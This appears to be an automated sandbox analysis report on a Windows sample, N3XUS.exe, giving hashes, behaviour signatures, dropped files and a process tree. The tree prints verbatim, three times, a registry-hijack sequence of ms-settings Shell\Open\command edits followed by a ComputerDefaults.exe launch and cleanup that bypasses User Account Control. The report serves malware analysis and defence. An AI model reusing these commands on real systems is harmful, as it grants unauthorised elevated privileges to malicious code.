Analysis

  • max time kernel
    240s
  • max time network
    244s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    21/11/2024, 09:56

General

  • Target

    N3XUS.exe

  • Size

    255KB

  • MD5

    a5c463cb69a24c37d962587706f4df4b

  • SHA1

    634520f698c5ce7df3e51174fe64306b1b0f1bfe

  • SHA256

    dcf5453a2be04f3ebe45d56e631a9cadb573b27de1ef142ecd958ba8560f0dd0

  • SHA512

    92f61d162802401ae7473e235becd580419a57e1cfe99475166717d93de26e51ecbd60bbebbe0b9a6a8fe15bb1c42c9f31676cef37815f040a0c408108c04c2e

  • SSDEEP

    3072:Sz2z1EWSnEvrSmD+l25mFdO4em5guIg+GtfDVVtTzKE:Sz2zBvrSmD/d4z5UlqDVvzKE

Score
6/10

Malware Config

Signatures

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Modifies registry class 33 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\N3XUS.exe
    "C:\Users\Admin\AppData\Local\Temp\N3XUS.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:572
    • C:\Windows\system32\cmd.exe
      /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2920
      • C:\Windows\system32\reg.exe
        reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
        3⤵
          PID:2924
      • C:\Windows\system32\cmd.exe
        /c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\9757.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2476
        • C:\Windows\system32\reg.exe
          reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\9757.vbs" /f
          3⤵
          • Modifies registry class
          PID:2808
        • C:\Windows\system32\reg.exe
          reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
          3⤵
          • Modifies registry class
          PID:2900
      • C:\Windows\system32\cmd.exe
        /c start /B ComputerDefaults.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2928
        • C:\Windows\system32\ComputerDefaults.exe
          ComputerDefaults.exe
          3⤵
            PID:2896
        • C:\Windows\system32\cmd.exe
          /c del /f C:\Users\Admin\AppData\Local\Temp\9757.vbs
          2⤵
            PID:2788
          • C:\Windows\system32\cmd.exe
            /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:2848
            • C:\Windows\system32\reg.exe
              reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
              3⤵
              • Modifies registry class
              PID:2700
          • C:\Windows\system32\cmd.exe
            /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:2844
            • C:\Windows\system32\reg.exe
              reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
              3⤵
                PID:3052
            • C:\Windows\system32\cmd.exe
              /c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\8582.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:2860
              • C:\Windows\system32\reg.exe
                reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\8582.vbs" /f
                3⤵
                • Modifies registry class
                PID:2776
              • C:\Windows\system32\reg.exe
                reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
                3⤵
                • Modifies registry class
                PID:2720
            • C:\Windows\system32\cmd.exe
              /c start /B ComputerDefaults.exe
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:2660
              • C:\Windows\system32\ComputerDefaults.exe
                ComputerDefaults.exe
                3⤵
                  PID:2708
              • C:\Windows\system32\cmd.exe
                /c del /f C:\Users\Admin\AppData\Local\Temp\8582.vbs
                2⤵
                  PID:2736
                • C:\Windows\system32\cmd.exe
                  /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2156
                  • C:\Windows\system32\reg.exe
                    reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
                    3⤵
                    • Modifies registry class
                    PID:1580
                • C:\Windows\system32\cmd.exe
                  /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1624
                  • C:\Windows\system32\reg.exe
                    reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
                    3⤵
                      PID:580
                  • C:\Windows\system32\cmd.exe
                    /c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\8619.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
                    2⤵
                      PID:1708
                      • C:\Windows\system32\reg.exe
                        reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\8619.vbs" /f
                        3⤵
                        • Modifies registry class
                        PID:1928
                      • C:\Windows\system32\reg.exe
                        reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
                        3⤵
                        • Modifies registry class
                        PID:1236
                    • C:\Windows\system32\cmd.exe
                      /c start /B ComputerDefaults.exe
                      2⤵
                        PID:1260
                        • C:\Windows\system32\ComputerDefaults.exe
                          ComputerDefaults.exe
                          3⤵
                            PID:2244
                        • C:\Windows\system32\cmd.exe
                          /c del /f C:\Users\Admin\AppData\Local\Temp\8619.vbs
                          2⤵
                            PID:924
                          • C:\Windows\system32\cmd.exe
                            /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
                            2⤵
                              PID:3028
                              • C:\Windows\system32\reg.exe
                                reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
                                3⤵
                                • Modifies registry class
                                PID:3020

                          Network

                          MITRE ATT&CK Enterprise v15

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          • C:\Users\Admin\AppData\Local\Temp\8582.vbs

                            Filesize

                            114B

                            MD5

                            34b33b5a437e20d03d79b62a797dfe99

                            SHA1

                            9b57b598a7e9d66157a05a44bc7c097bf5486e6c

                            SHA256

                            f920f526773c0565072fcfd250319c9dd53b9197d448b9d29307598e0fa004e1

                            SHA512

                            757be8161af2eb4af36772e2e0d912e0967540cb42ef6ef8cd85f28edb478756c99d9e7a6fef04b16e6bf63a3dc9ddb9c2adf490e8d9ae2ca0e3e9b76ef6fa6c

                          • C:\Users\Admin\AppData\Local\Temp\8619.vbs

                            Filesize

                            117B

                            MD5

                            bb8cfb89bce8af7384447115a115fb23

                            SHA1

                            6a0e728f4953128db9db52474ae5608ecee9c9c3

                            SHA256

                            d812291a41eddd5eac04972e66feffc44c1ee2c249d708bb282144823a6e8485

                            SHA512

                            d69901ba3cebd1fe8ed8e3d613e16a6cfbead827a9493a7edd8c62fb2915a550450ff4f47f00a8c66880ea10cd4029bceac4518d1951c19fb7ad9d7505007553

                          • C:\Users\Admin\AppData\Local\Temp\9757.vbs

                            Filesize

                            125B

                            MD5

                            8b4ed5c47fdddbeba260ef11cfca88c6

                            SHA1

                            868f11f8ed78ebe871f9da182d053f349834b017

                            SHA256

                            170226b93ac03ac3178c0429577626add00665e1d71be650a4c46674f6e262a5

                            SHA512

                            87e5bcaa143e616c365557f5af73e131a10eb380016633b8c7e38c83b0a216a8f6768cfa0166fad208d47830808444517e57d07d850ff2bd575ca67bad9eabdf

                          • C:\Users\Admin\AppData\Local\Temp\CabCFA0.tmp

                            Filesize

                            70KB

                            MD5

                            49aebf8cbd62d92ac215b2923fb1b9f5

                            SHA1

                            1723be06719828dda65ad804298d0431f6aff976

                            SHA256

                            b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

                            SHA512

                            bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

                          • C:\Users\Admin\AppData\Local\Temp\TarCFD2.tmp

                            Filesize

                            181KB

                            MD5

                            4ea6026cf93ec6338144661bf1202cd1

                            SHA1

                            a1dec9044f750ad887935a01430bf49322fbdcb7

                            SHA256

                            8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

                            SHA512

                            6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

                          • memory/572-0-0x00000000002E0000-0x00000000002E1000-memory.dmp

                            Filesize

                            4KB

                          • memory/572-1-0x00000000002F0000-0x00000000002F1000-memory.dmp

                            Filesize

                            4KB

                          • memory/572-2-0x0000000000310000-0x0000000000311000-memory.dmp

                            Filesize

                            4KB

                          • memory/572-4-0x0000000000330000-0x0000000000331000-memory.dmp

                            Filesize

                            4KB

                          • memory/2896-5-0x0000000002250000-0x0000000002251000-memory.dmp

                            Filesize

                            4KB

                          • memory/2896-9-0x0000000002250000-0x0000000002251000-memory.dmp

                            Filesize

                            4KB